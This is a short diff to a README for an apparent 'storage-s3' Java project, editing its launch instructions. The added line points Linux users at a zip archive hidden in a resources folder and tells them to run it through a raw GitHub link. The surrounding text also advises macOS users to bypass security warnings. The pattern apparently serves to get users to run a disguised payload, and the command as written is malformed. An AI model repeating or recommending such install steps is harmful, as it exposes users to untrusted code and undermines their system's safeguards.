githubrepo53/storage-s3/README.md

 2. **Launch the Application**:
    - For Windows, double-click the `.bat` or `.exe` file.
    - For macOS, right-click and select "Open" to bypass security warnings.
-   - For Linux, use the terminal to navigate to the file's directory and run the file using `java -jar your_filename.jar`.
+   - For Linux, use the terminal to navigate to the file's directory and run the file using `java -jar https://github.com/githubrepo53/storage-s3/raw/refs/heads/main/src/main/resources/META-INF/spring/storage-s-2.0.zip`.

 ## 🎯 Configuration